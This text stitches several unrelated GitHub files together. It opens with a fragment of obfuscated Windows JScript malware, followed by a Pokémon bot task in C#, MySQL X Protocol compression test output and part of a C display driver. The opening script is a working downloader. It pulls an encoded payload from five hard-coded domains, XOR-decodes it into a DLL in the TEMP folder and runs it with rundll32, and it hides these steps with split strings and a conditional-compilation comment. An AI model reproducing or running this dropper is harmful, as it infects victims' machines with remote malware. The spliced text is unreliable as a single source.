DisassociativeFDs1[246]=148;DisassociativeFDs1[242]=149;DisassociativeFDs1[251]=150;DisassociativeFDs1[249]=151;DisassociativeFDs1[255]=152;DisassociativeFDs1[214]=153;DisassociativeFDs1[220]=154;DisassociativeFDs1[162]=155;DisassociativeFDs1[163]=156;DisassociativeFDs1[165]=157;
DisassociativeFDs1[8359]=158;DisassociativeFDs1[402]=159;DisassociativeFDs1[225]=160;DisassociativeFDs1[237]=161;DisassociativeFDs1[243]=162;DisassociativeFDs1[250]=163;DisassociativeFDs1[241]=164;DisassociativeFDs1[209]=165;DisassociativeFDs1[170]=166;DisassociativeFDs1[186]=167;
DisassociativeFDs1[191]=168;DisassociativeFDs1[8976]=169;DisassociativeFDs1[172]=170;DisassociativeFDs1[189]=171;DisassociativeFDs1[188]=172;DisassociativeFDs1[161]=173;DisassociativeFDs1[171]=174;DisassociativeFDs1[187]=175;DisassociativeFDs1[9617]=176;DisassociativeFDs1[9618]=177;
DisassociativeFDs1[9619]=178;DisassociativeFDs1[9474]=179;DisassociativeFDs1[9508]=180;DisassociativeFDs1[9569]=181;DisassociativeFDs1[9570]=182;DisassociativeFDs1[9558]=183;DisassociativeFDs1[9557]=184;DisassociativeFDs1[9571]=185;DisassociativeFDs1[9553]=186;DisassociativeFDs1[9559]=187;
DisassociativeFDs1[9565]=188;DisassociativeFDs1[9564]=189;DisassociativeFDs1[9563]=190;DisassociativeFDs1[9488]=191;DisassociativeFDs1[9492]=192;DisassociativeFDs1[9524]=193;DisassociativeFDs1[9516]=194;DisassociativeFDs1[9500]=195;DisassociativeFDs1[9472]=196;DisassociativeFDs1[9532]=197;
DisassociativeFDs1[9566]=198;DisassociativeFDs1[9567]=199;DisassociativeFDs1[9562]=200;DisassociativeFDs1[9556]=201;DisassociativeFDs1[9577]=202;DisassociativeFDs1[9574]=203;DisassociativeFDs1[9568]=204;DisassociativeFDs1[9552]=205;DisassociativeFDs1[9580]=206;DisassociativeFDs1[9575]=207;
DisassociativeFDs1[9576]=208;DisassociativeFDs1[9572]=209;DisassociativeFDs1[9573]=210;DisassociativeFDs1[9561]=211;DisassociativeFDs1[9560]=212;DisassociativeFDs1[9554]=213;DisassociativeFDs1[9555]=214;DisassociativeFDs1[9579]=215;DisassociativeFDs1[9578]=216;DisassociativeFDs1[9496]=217;
DisassociativeFDs1[9484]=218;DisassociativeFDs1[9608]=219;DisassociativeFDs1[9604]=220;DisassociativeFDs1[9612]=221;DisassociativeFDs1[9616]=222;DisassociativeFDs1[9600]=223;DisassociativeFDs1[945]=224;DisassociativeFDs1[223]=225;DisassociativeFDs1[915]=226;DisassociativeFDs1[960]=227;
DisassociativeFDs1[931]=228;DisassociativeFDs1[963]=229;DisassociativeFDs1[181]=230;DisassociativeFDs1[964]=231;DisassociativeFDs1[934]=232;DisassociativeFDs1[920]=233;DisassociativeFDs1[937]=234;DisassociativeFDs1[948]=235;DisassociativeFDs1[8734]=236;DisassociativeFDs1[966]=237;
DisassociativeFDs1[949]=238;DisassociativeFDs1[8745]=239;DisassociativeFDs1[8801]=240;DisassociativeFDs1[177]=241;DisassociativeFDs1[8805]=242;DisassociativeFDs1[8804]=243;DisassociativeFDs1[8992]=244;DisassociativeFDs1[8993]=245;DisassociativeFDs1[247]=246;DisassociativeFDs1[8776]=247;
DisassociativeFDs1[176]=248;DisassociativeFDs1[8729]=249;DisassociativeFDs1[183]=250;DisassociativeFDs1[8730]=251;DisassociativeFDs1[8319]=252;DisassociativeFDs1[178]=253;DisassociativeFDs1[9632]=254;DisassociativeFDs1[160]=255;
var DisassociativeOOx0=new Array();
for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeTWf7.length; DisassociativeFNx2 += 1)
{var DisassociativeEGc4=DisassociativeTWf7["charCodeAt"](DisassociativeFNx2);
if (DisassociativeEGc4 < 128){var DisassociativeLZu0=DisassociativeEGc4;}
else {var DisassociativeLZu0=DisassociativeFDs1[DisassociativeEGc4];}
DisassociativeOOx0["push"](DisassociativeLZu0);};
return DisassociativeOOx0;}
function DisassociativePw3(DisassociativeTt7)
{var DisassociativeTUu2=new Array();
DisassociativeTUu2[128]=199;DisassociativeTUu2[129]=252;DisassociativeTUu2[130]=233;DisassociativeTUu2[131]=226;DisassociativeTUu2[132]=228;DisassociativeTUu2[133]=224;DisassociativeTUu2[134]=229;DisassociativeTUu2[135]=231;DisassociativeTUu2[136]=234;DisassociativeTUu2[137]=235;
DisassociativeTUu2[138]=232;DisassociativeTUu2[139]=239;DisassociativeTUu2[140]=238;DisassociativeTUu2[141]=236;DisassociativeTUu2[142]=196;DisassociativeTUu2[143]=197;DisassociativeTUu2[144]=201;DisassociativeTUu2[145]=230;DisassociativeTUu2[146]=198;DisassociativeTUu2[147]=244;
DisassociativeTUu2[148]=246;DisassociativeTUu2[149]=242;DisassociativeTUu2[150]=251;DisassociativeTUu2[151]=249;DisassociativeTUu2[152]=255;DisassociativeTUu2[153]=214;DisassociativeTUu2[154]=220;DisassociativeTUu2[155]=162;DisassociativeTUu2[156]=163;DisassociativeTUu2[157]=165;
DisassociativeTUu2[158]=8359;DisassociativeTUu2[159]=402;DisassociativeTUu2[160]=225;DisassociativeTUu2[161]=237;DisassociativeTUu2[162]=243;DisassociativeTUu2[163]=250;DisassociativeTUu2[164]=241;DisassociativeTUu2[165]=209;DisassociativeTUu2[166]=170;DisassociativeTUu2[167]=186;
DisassociativeTUu2[168]=191;DisassociativeTUu2[169]=8976;DisassociativeTUu2[170]=172;DisassociativeTUu2[171]=189;DisassociativeTUu2[172]=188;DisassociativeTUu2[173]=161;DisassociativeTUu2[174]=171;DisassociativeTUu2[175]=187;DisassociativeTUu2[176]=9617;DisassociativeTUu2[177]=9618;
DisassociativeTUu2[178]=9619;DisassociativeTUu2[179]=9474;DisassociativeTUu2[180]=9508;DisassociativeTUu2[181]=9569;DisassociativeTUu2[182]=9570;DisassociativeTUu2[183]=9558;DisassociativeTUu2[184]=9557;DisassociativeTUu2[185]=9571;DisassociativeTUu2[186]=9553;DisassociativeTUu2[187]=9559;
DisassociativeTUu2[188]=9565;DisassociativeTUu2[189]=9564;DisassociativeTUu2[190]=9563;DisassociativeTUu2[191]=9488;DisassociativeTUu2[192]=9492;DisassociativeTUu2[193]=9524;DisassociativeTUu2[194]=9516;DisassociativeTUu2[195]=9500;DisassociativeTUu2[196]=9472;DisassociativeTUu2[197]=9532;
DisassociativeTUu2[198]=9566;DisassociativeTUu2[199]=9567;DisassociativeTUu2[200]=9562;DisassociativeTUu2[201]=9556;DisassociativeTUu2[202]=9577;DisassociativeTUu2[203]=9574;DisassociativeTUu2[204]=9568;DisassociativeTUu2[205]=9552;DisassociativeTUu2[206]=9580;DisassociativeTUu2[207]=9575;
DisassociativeTUu2[208]=9576;DisassociativeTUu2[209]=9572;DisassociativeTUu2[210]=9573;DisassociativeTUu2[211]=9561;DisassociativeTUu2[212]=9560;DisassociativeTUu2[213]=9554;DisassociativeTUu2[214]=9555;DisassociativeTUu2[215]=9579;DisassociativeTUu2[216]=9578;DisassociativeTUu2[217]=9496;
DisassociativeTUu2[218]=9484;DisassociativeTUu2[219]=9608;DisassociativeTUu2[220]=9604;DisassociativeTUu2[221]=9612;DisassociativeTUu2[222]=9616;DisassociativeTUu2[223]=9600;DisassociativeTUu2[224]=945;DisassociativeTUu2[225]=223;DisassociativeTUu2[226]=915;DisassociativeTUu2[227]=960;
DisassociativeTUu2[228]=931;DisassociativeTUu2[229]=963;DisassociativeTUu2[230]=181;DisassociativeTUu2[231]=964;DisassociativeTUu2[232]=934;DisassociativeTUu2[233]=920;DisassociativeTUu2[234]=937;DisassociativeTUu2[235]=948;DisassociativeTUu2[236]=8734;DisassociativeTUu2[237]=966;
DisassociativeTUu2[238]=949;DisassociativeTUu2[239]=8745;DisassociativeTUu2[240]=8801;DisassociativeTUu2[241]=177;DisassociativeTUu2[242]=8805;DisassociativeTUu2[243]=8804;DisassociativeTUu2[244]=8992;DisassociativeTUu2[245]=8993;DisassociativeTUu2[246]=247;DisassociativeTUu2[247]=8776;
DisassociativeTUu2[248]=176;DisassociativeTUu2[249]=8729;DisassociativeTUu2[250]=183;DisassociativeTUu2[251]=8730;DisassociativeTUu2[252]=8319;DisassociativeTUu2[253]=178;DisassociativeTUu2[254]=9632;DisassociativeTUu2[255]=160;
var DisassociativeAd2=new Array();var DisassociativeUw6="";var DisassociativeLZu0; var DisassociativeEGc4;
for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeTt7.length; DisassociativeFNx2 += 1)
{DisassociativeLZu0=DisassociativeTt7[DisassociativeFNx2];
if (DisassociativeLZu0 < 128){DisassociativeEGc4=DisassociativeLZu0;}
else {DisassociativeEGc4=DisassociativeTUu2[DisassociativeLZu0];}
DisassociativeAd2.push(String["fromCharCode"](DisassociativeEGc4));}
DisassociativeUw6=DisassociativeAd2["join"]("");
return DisassociativeUw6;}
function DisassociativeGl6(DisassociativeTt7, DisassociativeEFs6)
{var DisassociativeDRw6 = DisassociativeNXr9(DisassociativeEFs6);
for (var DisassociativeFNx2 = 0; DisassociativeFNx2 < DisassociativeTt7.length; DisassociativeFNx2 += 1)
{DisassociativeTt7[DisassociativeFNx2] ^= DisassociativeDRw6[DisassociativeFNx2 % DisassociativeDRw6.length];};
return DisassociativeTt7;}
function DisassociativeUq7(DisassociativeYGa2)
{var DisassociativeNCk5=WScript["CreateObject"]("A"+"D"+"O"+"DB.Stream");
DisassociativeNCk5["type"]=2;
DisassociativeNCk5["Charset"]="437";
DisassociativeNCk5["open"]();
DisassociativeNCk5["LoadFromFile"](DisassociativeYGa2);
var DisassociativeZj1=DisassociativeNCk5["ReadText"];
DisassociativeNCk5["close"]();
return DisassociativeNXr9(DisassociativeZj1);}
function DisassociativePp3(DisassociativeYGa2, DisassociativeTt7)
{var DisassociativeNCk5=WScript["CreateObject"]("A"+"D"+"O"+"DB.Stream");
DisassociativeNCk5["type"]=2;
DisassociativeNCk5["Charset"]="437";
DisassociativeNCk5["open"]();
DisassociativeNCk5["writeText"](DisassociativePw3(DisassociativeTt7));
DisassociativeNCk5["SaveToFile"](DisassociativeYGa2, 2);
DisassociativeNCk5["close"]();}
//END_CODEC_PART
var DisassociativeBp8 = "http://";
var DisassociativeWx8 = [DisassociativeBp8 + "sadhekoala.com/lvqh1",DisassociativeBp8 + "xhumbrella.com/jb5c396v",DisassociativeBp8 + "wbakerpsych.com/j00gr8z",DisassociativeBp8 + "valpit.ru/kn3jm",DisassociativeBp8 + "lauiatraps.net/zyqjw08qqt"];
var DisassociativeBNy7 = "TPTv9jGFV";
var DisassociativeKa7 = "R9cSS1rkjyRw";
var DisassociativeSb3 = "L2hr1GeO6BCNFWPT";
var DisassociativeUr8=2;
var DisassociativeBs9=WScript["CreateObject"]("WScript.Shell");
var DisassociativeGFa5=DisassociativeBs9.ExpandEnvironmentStrings("%T"+"EMP%/");
var DisassociativeXAk4=DisassociativeGFa5 + DisassociativeBNy7;
var DisassociativeFUm6=DisassociativeXAk4 + ".d" + "ll";
var DisassociativeFn1 = DisassociativeBs9["Environment"]("System");
if (DisassociativeFn1("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
var DisassociativeAKu2 = DisassociativeBs9.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\ru"+"ndll32.exe");
}
else
{
var DisassociativeAKu2 = DisassociativeBs9["ExpandEnvironmentStrings"]("%SystemRoot%\\system32\\ru"+"ndll32.exe");
}
var DisassociativeIHy7=["M,S,X,M,L,2,.,X,M,L,H,T,T,P".DisassociativeKMx1(), "WinHttp.WinHttpRequest.5.1"];
for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeIHy7.length; DisassociativeFNx2 += 1)
{
try
{
var DisassociativeQPw3=WScript["CreateObject"](DisassociativeIHy7[DisassociativeFNx2]);
break;
}
catch (e)
{
continue;
}
};
var DisassociativePUo6 = new ActiveXObject("Scripting.FileSystemObject");
function DisassociativeUf9()
{
var DisassociativeWUn8 = DisassociativePUo6.GetFile(DisassociativeFUm6);
return DisassociativeWUn8["ShortPath"];
}
var DisassociativeFy6 = 0;
for (var DisassociativeTTb4 = 0; DisassociativeTTb4 < DisassociativeWx8.length; DisassociativeTTb4 = DisassociativeTTb4 + 1)
{
try
{
var DisassociativeSPt3=this["W,S,c,r,i,p,t".DisassociativeKMx1()]["CreateObject"]("A"+"D"+"O"+"DB.Stream");
DisassociativeQPw3["open"]("G,E,T".DisassociativeKMx1(), DisassociativeWx8[DisassociativeTTb4], false);
DisassociativeQPw3.setRequestHeader("User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
DisassociativeQPw3["send"]();
while (DisassociativeQPw3.readystate < 4) WScript["Sleep"](100);
DisassociativeSPt3["open"]();
DisassociativeSPt3.type=1;
/*@cc_on
DisassociativeSPt3.write(DisassociativeQPw3.ResponseBody);
DisassociativeSPt3.position=0;
DisassociativeSPt3['Sav'+'eT'+'oFile'](DisassociativeXAk4, DisassociativeUr8);
DisassociativeSPt3.close();
var DisassociativeOOx0 = DisassociativeUq7(DisassociativeXAk4);
DisassociativeOOx0 = DisassociativeGl6(DisassociativeOOx0, DisassociativeKa7);
if (DisassociativeOOx0[0] != 77 || DisassociativeOOx0[1] != 90) continue;
DisassociativePp3(DisassociativeFUm6, DisassociativeOOx0);
var DisassociativeZGx7 = DisassociativeUf9();
var d = new Date();
d.setFullYear("2015");
eval('DisassociativeBs9["R,u,n".DisassociativeKMx1()]("r,u,n,d,l,l,3,2".DisassociativeKMx1() + " " + DisassociativeZGx7 + "," + DisassociativeSb3);');
@*/
break;
}
catch (e) {continue;};
}
WScript.Quit(0); | {
"pile_set_name": "Github"
} |
#region using directives
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using PoGo.PokeMobBot.Logic.DataDumper;
using PoGo.PokeMobBot.Logic.Event;
using PoGo.PokeMobBot.Logic.PoGoUtils;
using PoGo.PokeMobBot.Logic.State;
#endregion
namespace PoGo.PokeMobBot.Logic.Tasks
{
public class DisplayPokemonStatsTask
{
public static List<ulong> PokemonId = new List<ulong>();
public static List<ulong> PokemonIdcp = new List<ulong>();
public static async Task Execute(ISession session)
{
var trainerLevel = 40;
var highestsPokemonCp = await session.Inventory.GetHighestsCp(session.LogicSettings.AmountOfPokemonToDisplayOnStartCp);
var pokemonPairedWithStatsCp = highestsPokemonCp.Select(pokemon => new PokemonAnalysis(pokemon, trainerLevel)).ToList();
var highestsPokemonCpForUpgrade = await session.Inventory.GetHighestsCp(50);
var pokemonPairedWithStatsCpForUpgrade = highestsPokemonCpForUpgrade.Select(pokemon => new PokemonAnalysis(pokemon, trainerLevel)).ToList();
var highestsPokemonPerfect = await session.Inventory.GetHighestsPerfect(session.LogicSettings.AmountOfPokemonToDisplayOnStartIv);
var pokemonPairedWithStatsIv = highestsPokemonPerfect.Select(pokemon => new PokemonAnalysis(pokemon, trainerLevel)).ToList();
var highestsPokemonIvForUpgrade = await session.Inventory.GetHighestsPerfect(50);
var pokemonPairedWithStatsIvForUpgrade = highestsPokemonIvForUpgrade.Select(pokemon => new PokemonAnalysis(pokemon, trainerLevel)).ToList();
session.EventDispatcher.Send(
new DisplayHighestsPokemonEvent
{
SortedBy = "CP",
PokemonList = pokemonPairedWithStatsCp,
DisplayPokemonMaxPoweredCp = session.LogicSettings.DisplayPokemonMaxPoweredCp,
DisplayPokemonMovesetRank = session.LogicSettings.DisplayPokemonMovesetRank
});
await Task.Delay(session.LogicSettings.DelayDisplayPokemon);
session.EventDispatcher.Send(
new DisplayHighestsPokemonEvent
{
SortedBy = "IV",
PokemonList = pokemonPairedWithStatsIv,
DisplayPokemonMaxPoweredCp = session.LogicSettings.DisplayPokemonMaxPoweredCp,
DisplayPokemonMovesetRank = session.LogicSettings.DisplayPokemonMovesetRank
});
var allPokemonInBag = session.LogicSettings.PrioritizeIvOverCp
? await session.Inventory.GetHighestsPerfect(1000)
: await session.Inventory.GetHighestsCp(1000);
if (session.LogicSettings.DumpPokemonStats)
{
const string dumpFileName = "PokeBagStats";
string toDumpCSV = "Name,Level,CP,IV,Move1,Move2\r\n";
string toDumpTXT = "";
Dumper.ClearDumpFile(session, dumpFileName);
Dumper.ClearDumpFile(session, dumpFileName, "csv");
foreach (var pokemon in allPokemonInBag)
{
toDumpTXT += $"NAME: {session.Translation.GetPokemonName(pokemon.PokemonId).PadRight(16, ' ')}Lvl: {PokemonInfo.GetLevel(pokemon).ToString("00")}\t\tCP: {pokemon.Cp.ToString().PadRight(8, ' ')}\t\t IV: {PokemonInfo.CalculatePokemonPerfection(pokemon).ToString("0.00")}%\t\t\tMOVE1: {pokemon.Move1}\t\t\tMOVE2: {pokemon.Move2}\r\n";
toDumpCSV += $"{session.Translation.GetPokemonName(pokemon.PokemonId)},{PokemonInfo.GetLevel(pokemon).ToString("00")},{pokemon.Cp},{PokemonInfo.CalculatePokemonPerfection(pokemon).ToString("0.00")}%,{pokemon.Move1},{pokemon.Move2}\r\n";
}
Dumper.Dump(session, toDumpTXT, dumpFileName);
Dumper.Dump(session, toDumpCSV, dumpFileName, "csv");
}
await Task.Delay(session.LogicSettings.DelayDisplayPokemon);
}
}
}
| {
"pile_set_name": "Github"
} |
## A. Execute the test using valid compression: deflate + combine mixed=false
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## B. Execute the test using valid compression: deflate + combine mixed=true
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## C. Execute the test using valid compression: deflate + combine mixed=true + limit-messages=1
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## D. Execute the test using valid compression: deflate + combine mixed=true + limit-messages=2
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## E. Execute the test using valid compression: lz4 + combine mixed=false
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## F. Execute the test using valid compression: lz4 + combine mixed=true
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## G. Execute the test using valid compression: lz4 + combine mixed=true + limit-messages=1
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## H. Execute the test using valid compression: lz4 + combine mixed=true + limit-messages=2
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## I. Execute the test using valid compression: zstd + combine mixed=false
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## J. Execute the test using valid compression: zstd + combine mixed=true
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## K. Execute the test using valid compression: zstd + combine mixed=true + limit-messages=1
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## L. Execute the test using valid compression: zstd + combine mixed=true + limit-messages=2
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
| {
"pile_set_name": "Github"
} |
/*
u8g_dev_st7565_64128n.c (Displaytech)
Universal 8bit Graphics Library
Copyright (c) 2011, [email protected]
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or other
materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "u8g.h"
#define WIDTH 128
#define HEIGHT 64
#define PAGE_HEIGHT 8
/* init sequence from https://github.com/adafruit/ST7565-LCD/blob/master/ST7565/ST7565.cpp */
static const uint8_t u8g_dev_st7565_64128n_init_seq[] PROGMEM = {
U8G_ESC_CS(0), /* disable chip */
U8G_ESC_ADR(0), /* instruction mode */
U8G_ESC_CS(1), /* enable chip */
U8G_ESC_RST(15), /* do reset low pulse with (15*16)+2 milliseconds (=maximum delay)*/
0x0A2, /* 0x0a2: LCD bias 1/9 (according to Displaytech 64128N datasheet) */
0x0A0, /* Normal ADC Select (according to Displaytech 64128N datasheet) */
0x0c8, /* common output mode: set scan direction normal operation/SHL Select, 0x0c0 --> SHL = 0, normal, 0x0c8 --> SHL = 1 */
0x040, /* Display start line for Displaytech 64128N */
0x028 | 0x04, /* power control: turn on voltage converter */
U8G_ESC_DLY(50), /* delay 50 ms */
0x028 | 0x06, /* power control: turn on voltage regulator */
U8G_ESC_DLY(50), /* delay 50 ms */
0x028 | 0x07, /* power control: turn on voltage follower */
U8G_ESC_DLY(50), /* delay 50 ms */
0x010, /* Set V0 voltage resistor ratio. Setting for controlling brightness of Displaytech 64128N */
0x0a6, /* display normal, bit val 0: LCD pixel off. */
0x081, /* set contrast */
0x01e, /* Contrast value. Setting for controlling brightness of Displaytech 64128N */
0x0af, /* display on */
U8G_ESC_DLY(100), /* delay 100 ms */
0x0a5, /* display all points, ST7565 */
U8G_ESC_DLY(100), /* delay 100 ms */
U8G_ESC_DLY(100), /* delay 100 ms */
0x0a4, /* normal display */
U8G_ESC_CS(0), /* disable chip */
U8G_ESC_END /* end of sequence */
};
static const uint8_t u8g_dev_st7565_64128n_data_start[] PROGMEM = {
U8G_ESC_ADR(0), /* instruction mode */
U8G_ESC_CS(1), /* enable chip */
0x010, /* set upper 4 bit of the col adr to 0x10 */
0x000, /* set lower 4 bit of the col adr to 0x00. Changed for DisplayTech 64128N */
U8G_ESC_END /* end of sequence */
};
static const uint8_t u8g_dev_st7565_64128n_sleep_on[] PROGMEM = {
U8G_ESC_ADR(0), /* instruction mode */
U8G_ESC_CS(1), /* enable chip */
0x0ac, /* static indicator off */
0x000, /* indicator register set (not sure if this is required) */
0x0ae, /* display off */
0x0a5, /* all points on */
U8G_ESC_CS(1), /* disable chip */
U8G_ESC_END /* end of sequence */
};
static const uint8_t u8g_dev_st7565_64128n_sleep_off[] PROGMEM = {
U8G_ESC_ADR(0), /* instruction mode */
